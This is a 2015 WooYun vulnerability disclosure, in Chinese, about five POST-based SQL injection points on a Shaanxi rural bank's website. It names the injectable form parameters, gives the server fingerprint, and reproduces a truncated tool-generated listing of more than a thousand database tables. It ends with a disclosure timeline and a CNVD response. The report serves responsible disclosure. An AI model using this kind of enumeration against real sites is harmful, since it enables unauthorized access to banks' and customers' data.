漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0148398
漏洞标题:陕西某银行官网5处SQL注入(上千表)
相关厂商:陕西某银行
漏洞作者: 路人甲
提交时间:2015-10-21 16:39
修复时间:2015-12-07 10:54
公开时间:2015-12-07 10:54
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-10-21: 细节已通知厂商并且等待厂商处理中
2015-10-23: 厂商已经确认,细节仅向厂商公开
2015-11-02: 细节向核心白帽子及相关领域专家公开
2015-11-12: 细节向普通白帽子公开
2015-11-22: 细节向实习白帽子公开
2015-12-07: 细节向公众公开
简要描述:
5处POST型注入,上千表。
详细说明:
陕西杨凌农商行官网存在5处POST型SQL注入,users数据库包含1630表...(本人不喜欢拖库,点到为止。)
漏洞证明:
杨凌农商行官网地址:http://**.**.**.**/
构造如下POST数据,其中company、contact、content、name、title五个参数都存在注入。
拿出工具测试下:
随便猜了下,肯定估计有users数据库(因为网速慢不想--dbs),试了下,果然有,我擦,竟然包含1630个表(有点震惊...),跑了好一阵,累死了
<code>web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: Apache 2.2.14
back-end DBMS: MySQL >= 5.0.0
Database: users
[1630 tables]
+-------------------------------------------------+
| ACT_INFO |
| ANSWER |
| ANSWER_GROUP_DETAIL |
| ASP |
| ActiveDataFeed |
| AdminUID |
| Administrator |
| Administratoren |
| Admins |
| Affichage1Affichage1edu |
| Affichage1name |
| Apply |
| Articoli |
| Artikel |
| Artiste |
| Auftrag |
| Author |
| Avion |
| BANCOS |
| BDDJoueurs |
| BDDJoueurs_colonies |
| BID |
| BONUS |
| BROWSE |
| BUYER |
| Bestellungen |
| Booked_On |
| CENTROS |
| CONTACT |
| COURSE_SECTION |
| CPG_config |
| CPG_filetypes |
| CPG_users |
| CUENTAS |
| CUST_HIST |
| Campus |
| Can_Fly |
| CategoryGroup |
| Catogorie |
| CheckType |
| ChicksPass |
| Class_Def_Table |
| Classification |
| ClassificationNode |
| ClassificationScheme |
| ClickTrack |
| Clienti |
| ClientsTable |
| CodeRuleType |
| Collection |
| Compagnie |
| Continent |
| Contributor |
| CountryCodes1 |
| Course |
| CustomNav |
| CustomerCards |
| DATA_ORG |
| DC_Data |
| DEMO_ASSIGNMENTS |
| DEPT |
| DIM_TYPE |
| DSObject_table |
| DSProp_table |
| DWE_Meta_Data |
| DWE_Org_Resources |
| DWE_Predecessors |
| DWE_Resource_Attributes |
| DWE_Resources |
| DWE_Tasks |
| DWE_WF_Attributes |
| DWE_Workflow_Documents |
| DWE_Workflows |
| D_Abbreviation |
| D_Comment |
| D_FA_ITENS |
| D_PR_ADVOGADOS |
| D_PR_APENSOS |
| D_PR_CUSTAS |
| D_PR_DESDOBRAMENTOS |
| D_PR_DOCUMENTOS |
| D_PR_EVENTOS |
| D_PR_HONORARIOS |
| D_PR_PARCELAMENTO |
| D_US_AREA_DE_TRABALHO |
| D_US_EQUIPES_DO_USUARIO |
| D_US_RECENTE |
| D_Unit |
| DataFeedPerformance1 |
| DatabaseInfo |
| Decimation |
| Descriptions_Languages |
| Descriptions_Regions |
| Descriptions_Scripts |
| Desert |
| Dragon_users |
| EDITEUR |
| ENROLLMENT |
| Editor |
| EmailAddress |
| Equipe |
| Etudiant |
| Events_new |
| ExtrinsicObject |
| Filme |
| FindCriteria |
| Firma |
| FoundLists |
| FoundThumbs |
| GLI_profiles |
| GRouteDetail |
| Genre |
| Gruppen |
| HISTORY |
| IDIOTIS |
| Inhalt |
| InstanceStringTable |
| JamPass |
| Joueur |
| Kontakt |
| Kontakte |
| Kontrolle |
| Kunde |
| Kunst |
| LT_CUSTOM1 |
| LT_CUSTOM3 |
| LT_CUSTOM4 |
| LT_FASE |
| LT_FOROS |
| LT_GARANTIA |
| LT_GRUPO |
| LT_JURISDICAO |
| LT_LANCAMENTO |
| LT_METODO_ATUALIZACAO |
| LT_NATUREZA |
| LT_SERIE |
| LT_SITUACAO |
| Lake |
| LastLoginDate |
| Lieux |
| LimitTest2 |
| MANAGEMENTGROUP |
| MM_NOTIFICACOES_DO_PROCESSO |
| MSmerge_altsyncpartners |
| MSmerge_errorlineage |
| MSrepl_identity_range |
| M_ESQUEMA_HORARIO |
| M_ESQUEMA_PERMISSAO |
| M_FATURAS |
| M_RELATORIOS |
| M_USUARIO |
| Market |
| MetadataFieldRegistry |
| MetadataValue |
| Microsoft |
| Mitglieder |
| Model |
| MonitorStatus |
| MyTicketek |
| MyTicketekArchive |
| NUEVOS |
| Namen |
| ORDERLINES |
| Offices |
| OperationStatus |
| PART |
| PN |
| POINT |
| POINT_SET |
| PRODUCTOS |
| PROYECTO |
| PS_DMK |
| PZ |
| Passwort |
| Pays |
| PerfPassword |
| PerfPasswordAllSelected |
| Personne |
| Poles_Zeros |
| Polynomial |
| Priority |
| Professoren |
| Promotion |
| Propdesc_table |
| Province |
| ProxyDataFeedPerformance |
| ProxyDataFeedShowtag |
| ProxyPriceInfo |
| QRTZ_LOCKS |
| R1Length |
| R1Size |
| R1Weights |
| R2IDF |
| R2Size |
| R2TF |
| RATING |
| REORDER |
| Region |
| RegistryPackage |
| S2ODTMAP |
| SALES |
| SALGRADE |
| SCALE |
| SELLER |
| SGA_XPLAN_TPL_DBA_TAB_COLS |
| SGA_XPLAN_TPL_V$SQL |
| SGA_XPLAN_TPL_V$SQLTEXT_NL |
| SGA_XPLAN_TPL_V$SQL_PLAN |
| SPJ |
| SUBSCRIBE |
| SUCURSALES |
| SYNALLAGI |
| S_LOG |
| SalesReps |
| SearchOptions |
| SecurityLevel |
| Sensitivity |
| Series |
| Service |
| ServiceBinding |
| Severity |
| Sheldonshows |
| Site_Login |
| Sitzungen |
| Sondage |
| SpecialityTable |
| SpecificationLink |
| Standorte |
| StateList |
| StateType |
| States |
| Station_Data |
| StringTable |
| Subject |
| Subjects |
| Sujets |
| Survey |
| SurveyAnswer |
| SurveyAnswerOpen |
| SurveyQuestion |
| SurveyRespondent |
| Systemadministratoren |
| TBLCORPORATEUSERS |
| TBLCORPUSERS |
| TBLLIST |
| TBLLOG |
| TBLPROFILES |
| TBLREPORTS |
| TBLRETAILUSERS |
| TBLTRANSACTIONS |
| TBLUSERS |
| THOT_ALPHA |
| THOT_DEEP |
| THOT_LANGUAGE |
| THOT_SOURCE |
| THOT_THEME |
| THOT_TYPE |
| Tabellen |
| Tagebuch |
| Tagung |
| Tasks |
| TelephoneNumber |
| Thumbnail |
| TimeDiff |
| Tisch |
| Titles |
| ToPacmail1 |
| ToPacmail2 |
| TypesTab |
| UM_ROLES |
| UM_ROLE_ATTRIBUTES |
| UM_USERS |
| UM_USER_ROLES |
| USUARIO |
| UsageDescription |
| UsageParameter |
| UserAdmin |
| UserCapability |
| UserFields |
| UserPreferences |
| UserType |
| Venue |
| VenuesNew |
| Verwaltung |
| WidgetReferences |
| X_3945 |
| ZENTRACK_VARFIELD |
| ZENTRACK_VARFIELD_IDX |
| 4images_users |
| Domain |
| GROUP |
| POSITION |
| Passwords by usage count |
| SPACE |
| TIME |
| Table |
| Ticket System Acc Numbers |
| Total Members |
| catalog |
| language |
| last |
| order |
| section |
| size |
| stone list |
| transaction |
| a_admin |
| abstract |
| access |
| accnt |
| accnts |
| account |
| account_level |
| account_log |
| account_map |
| account_permissions |
| account_transaction |
| accounts |
| accountuser |
| acctmanager |
| acctmanager2 |
| action_element |
| actualites |
| ad |
| ad_ad |
| ad_locales |
| add_irm |
| adm |
| admin |
| admin_id |
| admin_login |
| admin_logs |
| admin_name |
| admin_pass |
| admin_password |
| admin_psw |
| admin_pwd |
| admin_user |
| admin_userid |
| admin_username |
| adminid |
| administrables |
| administrateur |
| administrateurs |
| administrer |
| adminlogin |
| adminname |
| adminpassword |
| adminpaw |
| adminpwd |
| adminupass |
| adminuserid |
| adminusername |
| admuserinfo |
| adv |
| agencia |
| agenda |
| aggtest |
| aidf |
| album |
| aliasregex |
| anagrafica |
| answerOption |
| ap |
| apartments |
| appVersions |
| apwd |
| area |
| array_data |
| array_probe |
| article_admin |
| articles |
| asse |
| association |
| atividade |
| attivita |
| attributeCategory |
| audio |
| audit |
| aut |
| auteur |
| auth |
| authenticate |
| authentication |
| authors |
| autore |
| autorizacaonfe |
| backend |
| backend_users |
| backenduser |
| banners |
| bayview |
| bayviewpath |
| be_groups |
| binaries |
| binn_bann_pages |
| binn_basket_templ |
| binn_cache |
| binn_catalog_fields |
| binn_catlinks |
| binn_cform_list |
| binn_cform_textarea |
| binn_ct_templ |
| binn_faq_temps |
| binn_form39 |
| binn_forms_fields |
| binn_forms_templ_elems |
| binn_forum_maillist |
| binn_forum_settings |
| binn_forum_temps |
| binn_forum_themes_temps |
| binn_imagelib |
| binn_maillist |
| binn_maillist_sent |
| binn_menu |
| binn_menu_tlevel |
| binn_news |
| binn_news_temps |
| binn_order_temps |
| binn_page_elems |
| binn_rubrikator_temps |
| binn_site_users |
| binn_site_users_rights |
| binn_site_users_temps |
| binn_sprav |
| binn_sprav_temps |
| binn_submit_timeout |
| binn_texts |
| binn_user_rights |
| binn_vote |
| binn_vote_options |
| binn_vote_temps |
| bkp_ItemReplication |
| bkp_ItemResource |
| bkp_RS_Servers |
| bkp_String |
| bldg_types |
| bombing |
| book |
| bookings |
| books |
| booleantests |
| borders |
| borrower |
| branch |
| buecher |
| bugs |
| builds |
| bulletin |
| calendar |
| cards |
| cart |
| cart_table |
| catalogue |
| categorie |
| categories |
| category |
| categoryNames |
| categorylinks |
| cc_config |
| cc_info |
| cdb_access |
| cdb_activities |
| cdb_activityapplies |
| cdb_admingroups |
| cdb_adminnotes |
| cdb_advertisements |
| cdb_announcements |
| cdb_attachpaymentlog |
| cdb_banned |
| cdb_bbcodes |
| cdb_caches |
| cdb_campaigns |
| cdb_creditslog |
| cdb_crons |
| cdb_debateposts |
| cdb_debates |
| cdb_failedlogins |
| cdb_faqs |
| cdb_favorites |
| cdb_forumfields |
| cdb_forumlinks |
| cdb_forums |
| cdb_imagetypes |
| cdb_itempool |
| cdb_magicmarket |
| cdb_magics |
| cdb_memberfields |
| cdb_members |
| cdb_moderators |
| cdb_modworks |
| cdb_myposts |
| cdb_mythreads |
| cdb_onlinelist |
| cdb_orders |
| cdb_plugins |
| cdb_pluginvars |
| cdb_pms |
| cdb_pmsearchindex |
| cdb_polloptions |
| cdb_polls |
| cdb_posts |
| cdv_allele_curated_allele |
| cdv_curated_allele |
| cdv_curation |
| cfg |
| changePrix |
| channelitems |
| chart |
| chat_config |
| chat_messages |
| chat_users |
| chatbox |
| checksum_results |
| chip_layout |
| cia |
| cmAvailableServiceBinding |
| cmContent |
| cmContentRelation |
| cmEvent |
| cmLanguage |
| cmPublication |
| cmPublicationDetail |
| cmQualifyer |
| cmRepository |
| cmServiceDefinitionAvailableServiceBinding |
| cmSiteNode |
| cmSiteNodeTypeDefinition |
| cmSiteNodeVersion |
| cmSystemUser |
| cmSystemUserRole |
| cmTransactionHistory |
| cms_admin |
| cms_admins |
| cmts_track |
| cocktail |
| cocktail_person |
| color |
| colour |
| combustible |
| command |
| commandes |
| comments |
| commissionEmployees |
| companies |
| company |
| comptes |
| computers_ID |
| comuni |
| concessionnaire |
| concessionnaires |
| conf |
| conferences |
| config |
| config_seq |
| configuration |
| configuratore |
| connections |
| connectorswitches |
| connexion |
| contacts |
| contador |
| contenu |
| control |
| controle |
| convite |
| copyrights |
| counter |
| countries |
| coupon |
| courses |
| cpg132_users |
| credit |
| currency |
| curso |
| cust_order |
| customer |
| customers |
| customers_basket |
| cv_countries |
| cv_cropping_system |
| cv_crops |
| cv_pests_diseases |
| cv_soil |
| datasources |
| db |
| db_staff |
| db_version |
| dbaccount |
| dbadmin |
| dbadmins |
| dbpersoon |
| dbstaff |
| dbstudent |
| dbstudents |
| dbuser |
| dbusers |
| dealer |
| dealers |
| decodifica_tabelle |
| defertest |
| delete_reasons |
| delivery |
| delivery_quality |
| departement |
| department |
| departments |
| dependent |
| derived_types |
| despesa_aluno |
| despesa_familia |
| devel_logsql |
| diary |
| dictionary |
| directeur |
| disciplina |
| discipline |
| discipline_utenti |
| dist_universidade |
| distance |
| div_accession_collecting |
| div_allele |
| div_passport |
| div_poly_type |
| div_statistic_type |
| div_synonym |
| div_treatment |
| div_treatment_uom |
| document |
| documento |
| download |
| downloads |
| dtb_baseinfo |
| dtb_bat_order_daily_age |
| dtb_bat_order_daily_hour |
| dtb_best_products |
| dtb_category |
| dtb_class |
| dtb_csv |
| dtb_csv_sql |
| dtb_customer_mail_temp |
| dtb_customer_reading |
| dtb_kiyaku |
| dtb_mailtemplate |
| dtb_member |
| dtb_news |
| dtb_order_temp |
| dtb_other_deliv |
| dtb_pagelayout |
| dtb_payment |
| dtb_question_result |
| dtb_review |
| dtb_send_customer |
| dtb_update |
| dtb_user_regist |
| duvida |
| dw |
| dwp_news_kat |
| economy |
| edu |
| egresado |
| egresadoxidiomaxhabilidad |
| email |
| emailinfo |
| emp |
| employee |
| employees |
| employer |
| emu_services |
| encompasses |
| enregistrs |
| enrolled |
| enrollments |
| enrolls |
| enseignant |
| entity |
| entreprise |
| estados |
| estoque |
| etudiants |
| event |
| event_log |
| eventi |
| evidence |
| ew_gruppi |
| ew_menu |
| ew_tabelle |
| ewst_sessioni |
| exchange |
| experiencia |
| ezcontentobject_trash |
| ezin_articles |
| ezin_authors |
| ezin_sections |
| ezin_users |
| ezsearch_return_count_new |
| ezsearch_search_phrase_new |
| f_attributedefinition |
| f_options |
| f_spatialcontext |
| f_spatialcontextgroup |
| facets |
| facture |
| faculty |
| federationApplicants |
| field |
| filearchive |
| film |
| films |
| fiscal |
| fk_test_has_fk |
| form_definition |
| form_definition_text |
| form_error |
| forum_flag |
| forum_report |
| forum_topic |
| forum_user |
| forum_user_stat |
| forum_users |
| forum_vote |
| fragment |
| friends |
| fruit |
| func |
| fusion_user_groups |
| fusion_users |
| games |
| ganatlebe_ge |
| gd |
| general_log |
| genres_in_movies |
| geo_Desert |
| geo_Lake |
| geo_Mountain |
| geo_island |
| geo_river |
| geo_sea |
| gestionnaire |
| gifi |
| gl |
| glas |
| glmm |
| gly |
| grandchild_test |
| graphs_items |
| grau_parentesco |
| groupe |
| groupes |
| groups |
| grp |
| grupoatividade |
| gruppi |
| guanggaotp |
| guava_group_assignments |
| guava_roles |
| guava_roleviews |
| guava_sysmodules |
| gws_banner |
| gws_category |
| gws_jobs |
| gws_news |
| gws_product |
| gws_purchase |
| gws_text |
| hardware |
| hash |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| herunterladen |
| hibernate_unique_key |
| honorsinfo |
| hostbenchmarks |
| hot_prop |
| hourlyEmployees |
| humanitaruli_ge |
| ibf_admin_sessions |
| ibf_conf_settings |
| ibf_members |
| ibf_members_converge |
| ibf_sessions |
| icq |
| identification |
| identities |
| idiomaxegresado |
| ike_configs |
| images |
| index |
| individual |
| info |
| inscription |
| institution |
| intGroups |
| intUseringroup |
| intUsers |
| interactions |
| internetaddress |
| intranet_users |
| inventory |
| invoice |
| invoices |
| invoices_seq |
| ipassocs |
| ippaths |
| isMember |
| island |
| item |
| items |
| jforum_attach |
| jforum_categories |
| jforum_extensions |
| jforum_groups |
| jforum_privmsgs |
| jforum_roles |
| jforum_smilies |
| jforum_topics |
| jhu |
| jiveGroup |
| jiveRosterGroups |
| jiveSASLAuthorized |
| jiveUser |
| jos_bannerclient |
| jos_contact_details |
| jos_content_rating |
| jos_core_acl_aro |
| jos_core_log_searches |
| jos_docman |
| jos_estadisticas |
| jos_jce_groups |
| jos_jce_plugins |
| jos_jf_content |
| jos_languages |
| jos_newsfeeds |
| jos_poll_date |
| jos_user |
| jos_vm_auth_group |
| jos_vm_auth_user_group |
| jos_vm_auth_user_vendor |
| jos_vm_category |
| jos_vm_category_xref |
| jos_vm_coupons |
| jos_vm_creditcard |
| jos_vm_currency |
| jos_vm_function |
| jos_vm_payment_method |
| jos_vm_product |
| jos_vm_product_discount |
| jos_vm_product_files |
| jos_vm_product_product_type_xref |
| jos_vm_product_votes |
| jos_vm_shopper_group |
| jos_vm_user_info |
| jos_vm_userfield |
| jos_vm_waiting_list |
| journal |
| jubjub_errors |
| kbase_main |
| langlinks |
| languages |
| leases |
| librarian |
| licenses |
| liens |
| ligneDeFacture |
| line_items_seq |
| links |
| list |
| lists |
| live_ge |
| livre |
| loan |
| locale |
| location |
| locus_data |
| login |
| login_admin |
| login_name |
| login_user |
| login_users |
| loginout |
| logins |
| logon |
| logout |
| logradouro |
| logs |
| lokal |
| lost_pass |
| lost_passwords |
| lostpass |
| m_admin |
| m_earnings |
| m_users |
| m_users_acct |
| m_users_profile |
| m_with |
| mac |
| maclinks |
| macswitches |
| mail |
| mailaddresses |
| mailbox |
| main |
| mambo_session |
| mambo_users |
| manage |
| manager |
| manutencao |
| mapdata |
| marital_status |
| master_table |
| maxcodcorreo |
| maxcodcurso |
| maxcodtelefono |
| meals |
| memberid |
| memberlist |
| members |
| membre |
| membres |
| membros_familia |
| menu |
| mergesWith |
| messages |
| mima |
| minibbtable_users |
| mixins |
| mlattach |
| mlgroup |
| mlmail |
| mm |
| modulemailling |
| modulemessage |
| modules |
| monitoringi_ge |
| mountain |
| mpassword |
| mtb_zip |
| mucMember |
| mucRoom |
| musername |
| mushroom_dataset |
| mushroom_testset |
| music_ge |
| music_items |
| my_county |
| my_street |
| mymps_advertisement |
| mymps_channel |
| mymps_checkanswer |
| mymps_config |
| mymps_corp |
| mymps_crons |
| mymps_mail_template |
| mymps_member_category |
| mymps_member_comment |
| mymps_member_docu |
| mymps_member_docutype |
| mymps_news_focus |
| mymps_news_img |
| mymps_payrecord |
| mymps_telephone |
| mymps_upload |
| mysql |
| nc |
| ncat |
| ndb_binlog_index |
| networking |
| new |
| news |
| nguoidungs |
| nlconfig |
| nodes |
| nom |
| noms |
| not_null_test |
| not_null_with_default_test |
| not_sent_mails |
| notafiscal |
| notes |
| noticias |
| nuke_autonews |
| nuke_banner |
| nuke_bbauth_access |
| nuke_bbdisallow |
| nuke_bbgroups |
| nuke_bbposts_text |
| nuke_bbprivmsgs |
| nuke_bbprivmsgs_text |
| nuke_bbsearch_wordlist |
| nuke_bbsessions |
| nuke_bbsmilies |
| nuke_bbthemes_name |
| nuke_bbtopics |
| nuke_bbtopics_watch |
| nuke_bbuser_group |
| nuke_bbvote_desc |
| nuke_bbvote_results |
| nuke_comments |
| nuke_downloads_downloads |
| nuke_downloads_editorials |
| nuke_downloads_modrequest |
| nuke_downloads_newdownload |
| nuke_downloads_votedata |
| nuke_encyclopedia |
| nuke_encyclopedia_text |
| nuke_faqcategories |
| nuke_gallery_media_class |
| nuke_gallery_media_types |
| nuke_groups |
| nuke_headlines |
| nuke_journal |
| nuke_links_categories |
| nuke_links_editorials |
| nuke_links_links |
| nuke_links_newlink |
| nuke_links_votedata |
| nuke_main |
| nuke_message |
| nuke_poll_check |
| nuke_poll_data |
| nuke_poll_desc |
| nuke_public_messages |
| nuke_queue |
| nuke_referer |
| nuke_related |
| nuke_reviews_add |
| nuke_reviews_comments |
| nuke_session |
| nuke_stats_year |
| nuke_stories_cat |
| nuke_topics |
| nuke_users |
| nuked_page |
| numedia |
| obb_profiles |
| object |
| offers |
| oil_banner |
| oil_bannerclient |
| oil_bannertrack |
| oil_bfsurvey_pro |
| oil_bfsurvey_pro_categories |
| oil_bfsurvey_pro_example |
| oil_bfsurveypro_34 |
| oil_bfsurveypro_35 |
| oil_biolmed_blocks |
| oil_biolmed_land |
| oil_biolmed_measurements |
| oil_biolmed_measures_by_entity_types |
| oil_biolmed_technician |
| oil_biolmed_thesis |
| oil_categories |
| oil_components |
| oil_content_rating |
| oil_core_acl_aro_groups |
| oil_core_acl_aro_map |
| oil_core_acl_aro_sections |
| oil_core_log_items |
| oil_core_log_searches |
| oil_dbcache |
| oil_google |
| oil_google_destinations |
| oil_groups |
| oil_jf_tableinfo |
| oil_languages |
| oil_menu |
| oil_menu_types |
| oil_migration_backlinks |
| oil_newsfeeds |
| oil_phocadownload |
| oil_phocadownload_sections |
| oil_phocadownload_settings |
| oil_phocadownload_user_stat |
| oil_phocagallery |
| oil_phocagallery_categories |
| oil_phocagallery_comments |
| oil_phocagallery_img_votes |
| oil_plugins |
| oil_polls |
| oil_rokversions |
| oil_sections |
| oil_users |
| oldimage |
| operation |
| order_line |
| order_source |
| orders |
| ordre |
| ordreReparation |
| organization |
| organization_seq |
| organizations |
| orgs |
| osc_products |
| osc_products_attributes_download |
| osc_products_options_values_to_prod
修复方案:
过滤、修改!
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2015-10-23 10:53
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置同时下发陕西分中心.
最新状态:
暂无